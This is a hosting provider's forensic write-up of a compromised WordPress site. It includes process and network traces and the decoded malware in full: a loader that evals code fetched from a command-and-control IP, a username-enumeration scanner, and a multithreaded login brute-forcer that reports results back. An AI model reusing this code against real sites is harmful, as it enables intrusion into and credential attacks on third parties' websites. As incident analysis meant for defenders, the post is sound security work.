Anatomy of a WordPress Hack

26 June 2015 / by Marek / Security, Systems Administration, Linux, Malware, Distributed Denial of Service Attack + Tech Deep Dives.

Anatomy of a WordPress Hack

Originally a blogging platform, WordPress has grown in popularity to the point of becoming a huge ecosystem of plugins and themes built by thousands of developers across the world. WordPress, at the core, is a very simple piece of software. It is, arguably, one of the best blogging platforms. It was never designed to be a full content management system able to run an online web shop, host user-editable calendars, purge content as it changes from caching HTTP accelerators… it was made to show a few user-editable pages and host a blog. Being so small and self-contained at the core, WordPress’ simplicity is intrinsic to its popularity. So while WordPress doesn’t do very much “out of the box” it is easy to add things to it. The shallow learning curve, coupled with the large developer community, makes it a great place to learn about web technologies and content management systems. This has created a tension: security.

If you find WordPress lacking, you either develop a module yourself or download somebody else’s. The problem is that you are now reliant upon other people’s code to not be buggy, insecure, or inefficient. This can conflict with the attractive of WordPress to novice developers. Lacking some the experience of (or even just guidance from) battle-hardened devlopers, the plugin you have installed might be riddled with as yet undiscovered problems. If the developer of the plugin is slow at pushing out a security fix, you will be slow installing the updates (though in our experience, only about half of WordPress blogs seem to get updated by their users).

Even if you do update your active plugins, it is possible that a plugin that was installed and subsequently deactivated (but not removed entirely) can pose a security threat. Its files still reside on disk, and — depending on the configuration of the server and the code in question — can still be made to run by visiting a specific URL.

This happened to a customer of ours: a plugin that they had deactivated long ago still had vulnerable PHP files on disk. It didn’t get updated (“it’s not active!”). And eventually, a bot swept through a list of URLs to test, found a vulnerable piece of code, and gained entry.

Every single PHP file in the attacked WordPress site had a backdoor injected into it. Every single PHP file that the site could access was modified in this way — so backup versions of the code were also modified. Were we to run our shared web servers requests all as the same user, and that user had write permission to all websites (because that seems to be the preferred way for WordPress to update itself), every single site we host on those servers would have been compromised. For this reason, we run with suPHP: each customer’s PHP scripts are executed by their own user and group. They cannot change anything belonging to other customers.

The backdoor injection was a smart move by the attackers, because it makes clean-up post-infection harder. Hundreds of PHP files would have needed manually checking (automated scripts were too coarse to remove everything without damaging some of the PHP files). We advised them to reinstall all the code from scratch.

Faelix scanned the database for any potential code injections there — this is one of the preferred ways of backdooring a Drupal website. We could not spot any backdoor code in the site, thankfully. So we then went through all the other files on the site, finding several additional PHP files in the WordPress uploads directory, in the root of the site, and alongside modules (with filenames that wouldn’t be overwritten by a newer version of the module).

So what did the hacked site end up doing?

One of the most common things hacked WordPress sites do is spread the infection. This was no exception. We saw five processes running:

hackedcustomer    4409  0.0  0.6 182736 28156 ?        S    14:37   0:03 php -q /tmp/tmp
hackedcustomer    4762  0.0  0.6 185600 26844 ?        S    15:03   0:01 php -q /tmp/tmp
hackedcustomer    5474  0.0  0.6 181564 26980 ?        S    15:29   0:01 php -q /tmp/tmp
hackedcustomer    6164  0.0  0.6 181304 25080 ?        S    15:55   0:00 php -q /tmp/tmp
hackedcustomer    7251  0.0  0.2 164048 10288 ?        S    16:20   0:00 php -q /tmp/tmp

A quick scan of the contents of /proc turned up dates and times that these processes had come into existence, and we could cross-correlate that with the Apache server logs to find where the initial “command” had come from, and redirected traffic from that IP address to our honeypot/forensics server called “shitpit”. Meanwhile we ran strace on one of the processes. Sure enough, it was making outbound web requests:

connect(3, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("54.154.XXX.XXX")}, 16) = -1 EINPROGRESS (Operation now in progress)
clock_gettime(CLOCK_MONOTONIC, {5335844, 178514618}) = 0
clock_gettime(CLOCK_MONOTONIC, {5335844, 178682561}) = 0
poll([{fd=3, events=POLLOUT|POLLWRNORM}], 1, 1000) = 1 ([{fd=3, revents=POLLOUT|POLLWRNORM}])
clock_gettime(CLOCK_MONOTONIC, {5335844, 191107212}) = 0
getsockopt(3, SOL_SOCKET, SO_ERROR, [0], [4]) = 0
getpeername(3, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("54.154.XXX.XXX")}, [16]) = 0
getsockname(3, {sa_family=AF_INET, sin_port=htons(43289), sin_addr=inet_addr("46.227.20X.XXX")}, [16]) = 0

clock_gettime(CLOCK_MONOTONIC, {5335884, 878398690}) = 0
clock_gettime(CLOCK_MONOTONIC, {5335884, 878567133}) = 0
poll([{fd=3, events=POLLOUT|POLLWRNORM}], 1, 1000) = 1 ([{fd=3, revents=POLLOUT|POLLWRNORM}])
clock_gettime(CLOCK_MONOTONIC, {5335884, 955507807}) = 0
getsockopt(3, SOL_SOCKET, SO_ERROR, [0], [4]) = 0
getpeername(3, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("192.34.XXX.XXX")}, [16]) = 0
getsockname(3, {sa_family=AF_INET, sin_port=htons(34508), sin_addr=inet_addr("46.227.20X.XXX")}, [16]) = 0
clock_gettime(CLOCK_MONOTONIC, {5335884, 956420309}) = 0
clock_gettime(CLOCK_MONOTONIC, {5335884, 956591499}) = 0
clock_gettime(CLOCK_MONOTONIC, {5335884, 956760432}) = 0
clock_gettime(CLOCK_MONOTONIC, {5335884, 956927738}) = 0

Between the five processes, they were churning through connections at quite a rate:

tcp        0      0 46.227.20X.XXX:35996    173.254.XXX.XXX:80      ESTABLISHED 6164/php
tcp        0      0 46.227.20X.XXX:35474    101.79.XXX.XXX:80       TIME_WAIT   -
tcp        0    379 46.227.20X.XXX:38194    184.168.XXX.XXX:80      ESTABLISHED 4409/php
tcp        0      0 46.227.20X.XXX:58522    192.185.XXX.XXX:80      ESTABLISHED 5474/php
tcp        0      0 46.227.20X.XXX:52072    157.7.XXX.XXX:80        ESTABLISHED 4762/php

tcp        0      0 46.227.20X.XXX:35474    101.79.XXX.XXX:80       TIME_WAIT   -
tcp        0    180 46.227.20X.XXX:58543    192.185.XXX.XXX:80      ESTABLISHED 5474/php
tcp        0      0 46.227.20X.XXX:36595    178.79.XXX.XXX:80       ESTABLISHED 4409/php
tcp        0      0 46.227.20X.XXX:36009    173.254.XXX.XXX:80      ESTABLISHED 6164/php
tcp        0      0 46.227.20X.XXX:52095    157.7.XXX.XXX:80        ESTABLISHED 4762/php

tcp        0      0 46.227.20X.XXX:58559    192.185.XXX.XXX:80      ESTABLISHED 5474/php
tcp        0      0 46.227.20X.XXX:35474    101.79.XXX.XXX:80       TIME_WAIT   -
tcp        0      0 46.227.20X.XXX:36614    178.79.XXX.XXX:80       ESTABLISHED 4409/php
tcp        0      1 46.227.20X.XXX:36043    173.254.XXX.XXX:80      SYN_SENT    6164/php

tcp        0      0 46.227.20X.XXX:36625    178.79.XXX.XXX:80       ESTABLISHED 4409/php
tcp        0      0 46.227.20X.XXX:58559    192.185.XXX.XXX:80      ESTABLISHED 5474/php
tcp        0      0 46.227.20X.XXX:35474    101.79.XXX.XXX:80       TIME_WAIT   -
tcp        0      0 46.227.20X.XXX:52104    157.7.XXX.XXX:80        ESTABLISHED 4762/php

tcp        0      0 46.227.20X.XXX:52114    157.7.XXX.XXX:80        ESTABLISHED 4762/php
tcp        0      0 46.227.20X.XXX:58559    192.185.XXX.XXX:80      ESTABLISHED 5474/php
tcp        0      0 46.227.20X.XXX:35474    101.79.XXX.XXX:80       TIME_WAIT   -
tcp        0    371 46.227.20X.XXX:36051    173.254.XXX.XXX:80      ESTABLISHED 6164/php

Soon our forensics box saw the command and control attempt: a pair of variables in a HTTP POST to a specific URL:

Array
(
    cookie => 1
    a88027eb01 => JGtvZC...SNIP...l0OyAg
)

The large base-64 encoded payload decoded to:

function get22($url)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLINFO_HEADER_OUT, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)");
    curl_setopt($ch, CURLOPT_ENCODING, "utf-8");
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    $data = curl_exec($ch);
    curl_close($ch);
    return $data;
}
@eval(@get22("http://31.184.192.234/ww22/codes.php"))  ;

@file_put_contents('/tmp/tmp',$kod);
if (strstr(file_get_contents('/tmp/tmp'),'@eval')) {
    @system('php -q /tmp/tmp < /dev/null > /tmp/php5.tmp &');
}
sleep(10);
unlink('/tmp/tmp'); echo 'g00d1'; exit;

The fetched codes.php contained the real payload: the long-running “bot” process which would fetch further instructions from the same server, 31.184.192.234 — hosted at a Russian ISP. Now to analyse roughly what it does.

First, it becomes a long-running process, tries to cover its tracks (especially in combination with the unlink above), and sheds as many limits as possible:

@set_time_limit(0);
@error_reporting(0);
@ignore_user_abort(1);

sleep(1000);

Here are some logins to try:

$logins = array('admin','administrator','webmaster','wpadmin','wp_admin','editor','root');

This function is used to:

fetch the list of sites to try hacking
fetch the sites’ Atom feeds
fetch pages looking for authors (usernames) on the target sites

It masquerades as Google Bot:

function get($url)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLINFO_HEADER_OUT, 1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
    curl_setopt($ch, CURLOPT_ENCODING, 'utf-8');
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    $data = curl_exec($ch);
    curl_close($ch);
    return $data;
}

The check function tries to login to the target website. This function gives hints of a few low-hanging fruit for blocking automated WordPress logins (which we have implemented on our shared servers). It appears that this script has a hard-coded password, but the purpose of this script does not appear to be to gain access: it is a distributed scanner, identifying WordPress sites as potential targets.

function check($url,$login) {
$login = strtolower($login);
$postData = 'log='.$login.'&pwd=hoho17&wp-submit=Log+In&redirect_to='.$url.'wp-admin/&testcookie=1';
$url = $url.'wp-login.php';
    $ch = curl_init();
    curl_setopt($ch,CURLOPT_URL,$url);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
    curl_setopt($ch,CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
    curl_setopt($ch, CURLOPT_COOKIE, "wordpress_test_cookie=WP+Cookie+check");
    curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
    $output=curl_exec($ch);
    curl_close($ch);
if (strstr($output,'value="'.$login.'"')) { return true; } else { return false; }
}

The send function seems to be used for reporting back any user account names uncovered during the site scan:

function send($kod,$array) {
$postData = 'kod='.$kod.'&array='.$array;
    $ch = curl_init();
    curl_setopt($ch,CURLOPT_URL,'http://31.184.192.234/ww22/day.php');
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
    curl_setopt($ch,CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
    curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
    $output=curl_exec($ch);
    curl_close($ch);
}

The mis-spelled (or Spanish-named?) get_autor function and get_atom function are used to find user account names on the target site:

function get_autor($url) {
$user = array();

for ($z=1 ; $z<=3; $z++) {
$otv = @get($url.'?author='.$z);
$pattern = '/class="archive author author-([a-z0-9 _.\-@]{2,30}) /iU';
preg_match($pattern, $otv, $matches);
if (isset($matches[1])) $user[] = $matches[1];
$pattern2 = '/Posts by ([a-z0-9 _.\-@]{2,30}) Feed/iU';
preg_match($pattern2, $otv, $matches2);
if (isset($matches2[1])) $user[] = $matches2[1];
}
return $user;
}

function get_atom($url) {
$user = array();
$otv = @get($url.'?feed=atom');
$pattern = '/<name>([a-z0-9 _.\-@]{2,30})<\/name>/i';
preg_match_all($pattern, $otv, $matches);
if (isset($matches[1])) {
for ($z=0 ; $z<=sizeof($matches[1])-1; $z++) {
$user[] = $matches[1][$z];
}
}
return $user;
}

The test1 function seems to be to determine whether a target site is running WordPress and permits logins, and decides which usernames to attack:

function test1($url) {
global $logins;
$arr = array();
$autor = array();
$tmp = get($url.'wp-login.php');
if (strstr($tmp,'"log"') and strstr($tmp,'"pwd"')) {
$autor = get_autor($url);
$atom = get_atom($url);
$mass = array_values(array_unique(array_merge(array_merge($autor,$atom),$logins)));
$mass = array_map('strtolower', $mass);
for ($z=0 ; $z<=sizeof($mass)-1; $z++) {
if (check($url,$mass[$z])) $arr[]=$mass[$z];
}
}
if (isset($arr[0])) { return implode(';',$arr); } else return 'nonon';
}

go compiles the list of site and username combinations (if the script has found any usernames to attack). The developer of this script does not seem to understand what null is for, opting for a hard-coded value “nonon” instead.

function go($array) {
$hosts = $array;
$otv=array();
for ($i=0 ; $i<=sizeof($hosts)-1; $i++) {

$host = $hosts[$i];
$string = str_replace("\r", '',$host);
$host = str_replace("\n", '',$string);
$user = @test1($host);
if ($user != 'nonon') $otv[] = $host.'  '.$user;
}
return $otv;
}

Finally it executes: fetch the targets, attack them, send in results, and repeat from the beginning.

while (true)
{
$get =  get('http://31.184.192.234/ww22/');
if (strstr($get,'!-START-!')) {
$temp = explode('!-START-!',$get);
$arr = explode("\n",str_replace("\r", '',$temp[1]));
$kod = $arr[0];
array_splice($arr,0,1);
if (sizeof($arr)>100) {
$tmp = go($arr);
if (isset($tmp[0])) {
$otv = implode("\r\n",$tmp);
send($kod,$otv);
} else exit;
} else exit;
} else exit;
}

All in all, this reconnaisance script is pretty effective:

it is easy to command and control
it tries to determine some account names before attacking
the attack is distributed in such a manner that it does not trigger e.g. fail2ban scanning logfiles for repeated login failures from one address
quite likely the owners of the bot-net will have picked to try common passwords (but maybe they’re not so smart as to filter that by the target blog’s language)

A few days later, another attack attempt tried to send us the following long-running script:

@set_time_limit(0);
@error_reporting(0);
@ignore_user_abort(1);

sleep(333);

The send and get functions seem pretty similar:

function send($kod,$array) {
$postData = 'kod='.$kod.'&array='.$array;
    $ch = curl_init();
    curl_setopt($ch,CURLOPT_URL,'http://31.184.192.234/wbr/day.php');
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
    curl_setopt($ch,CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
    curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
    $output=curl_exec($ch);
    curl_close($ch);
}

function get($url)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLINFO_HEADER_OUT, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)");
    curl_setopt($ch, CURLOPT_ENCODING, "utf-8");
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    $data = curl_exec($ch);
    curl_close($ch);
    return $data;
}

But what go does is completely different! For starters, the code is indented. It uses Curl in multiple threads, too — why no threads in the “scout” script? Are they under pressure to deliver more results, faster?

There is a strange mix of camelCaps and under_score variable names. This suggests an uncoordinated development team — or maybe copy/paste from StackOverflow or other code?

Strangely, rather than testing for a “302” HTTP redirect (WordPress signals “success” as a redirect and “failure” as a HTTP 200 OK), the developers of this malware are checking whether they have been redirected to a URL they supply in the login attempt: wp-admin/test1a0 (which could be an interesting signature for spotting this attack in targets’ logfiles).

Also, the same low-hanging fruit apply in this code.

function go($aid) {
$otv = array();
$links = file('http://31.184.192.234/wbr/bbd/'.$aid, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
if (sizeof($links)<3000) exit;
$maxThreads = 50;
$multicurlInit = curl_multi_init();
do
{
    while(@$active <= $maxThreads)
    {
        @$active++;
        if(count($links) == 0)
            break;
        $idLink = array_rand($links);
        $link = $links[$idLink];
        $temp_arr = explode('   ',$link);
        $url = $temp_arr[0];
        $login = $temp_arr[1];
        $pass = $temp_arr[2];
        $postData = 'log='.urlencode($login).'&pwd='.urlencode($pass).'&wp-submit=Log+In&redirect_to='.$url.'wp-admin/tes1a0&testcookie=1';
        unset($links[$idLink]);
        $newThread = curl_init();
        curl_setopt_array($newThread, array(
                CURLOPT_URL            => $url.'wp-login.php',
                CURLOPT_RETURNTRANSFER => true,
                CURLOPT_HEADER => true,
                CURLOPT_POST => true,
                CURLOPT_CONNECTTIMEOUT => 10,
                CURLOPT_TIMEOUT        => 30,
                CURLOPT_USERAGENT      => 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
                CURLOPT_COOKIE      => "wordpress_test_cookie=WP+Cookie+check",
                CURLOPT_POSTFIELDS      => $postData,
                CURLOPT_PRIVATE      => $url.'  '.$login.'  '.$pass,
                CURLOPT_FAILONERROR    => false,
            )
        );
        curl_multi_add_handle($multicurlInit, $newThread);
        unset($newThread);
    }
    $curlMultiResult = curl_multi_exec($multicurlInit, $active);
    do
    {
        $result = curl_multi_info_read($multicurlInit);
        if( ! is_array($result))
            break;
        $id = curl_getinfo($result['handle'], CURLINFO_PRIVATE);
        $ttemp =  curl_multi_getcontent($result['handle']);
        if (preg_match("/Location:(.*?)tes1a0/", $ttemp)) $otv[] = $id;
        curl_multi_remove_handle($multicurlInit, $result['handle']);
        curl_close($result['handle']);
    } while(true);
    if(count($links) == 0 && $active == 0)
        break;
} while(true);
return $otv;
}

This malware’s C&C implements a system to send the malware a batch of targets, which it then fetches. The developer behind this section isn’t too smart: rather than writing all this code to parse with regexps and explode, they could have just used two lines of PHP to parse a JSON response. Maybe there’s a small team of developers behind this malware: someone putting together the interface to the database of targets, someone who wrote the original exploit, and a slightly more experienced coder who added threads?

$err = 0;
while (true)
{
$idtemp = @get('http://31.184.192.234/wbr/');
if ($idtemp=='ext') exit;
if (preg_match("/ISD(.*?)ISD/", $idtemp)) {
$idtemp2 = explode('ISD',$idtemp);
$id = $idtemp2[1];
$arr = go($id);
if (isset($arr[0])) {
send($id,implode('|',$arr));
}
@get('http://31.184.192.234/wbr/de1s.php?d='.$id.'|'.sizeof($arr));
$err = 0;
} else { $err = $err+1; sleep(300); }
if ($err>12) exit;
}

Faelix scanned through a couple of web servers’ logfiles to look for attacks that matched these signatures, and compared with some of the target files served by this malware’s C&C server. It’s quite probable that this Russian C&C server’s operators aren’t the only people doing this kind of attack: we found numerous websites we host were being targetted, but none appeared on this group’s lists.

Did several hackers think of the same techniques, all stumbling upon the same “best practices” to maximise the efficiency of their payloads? Have they been sharing “good ideas” on some forum, and implemented group-think signatures? Or is there no honour among thieves, and code stealing is rife within this underground “industry”?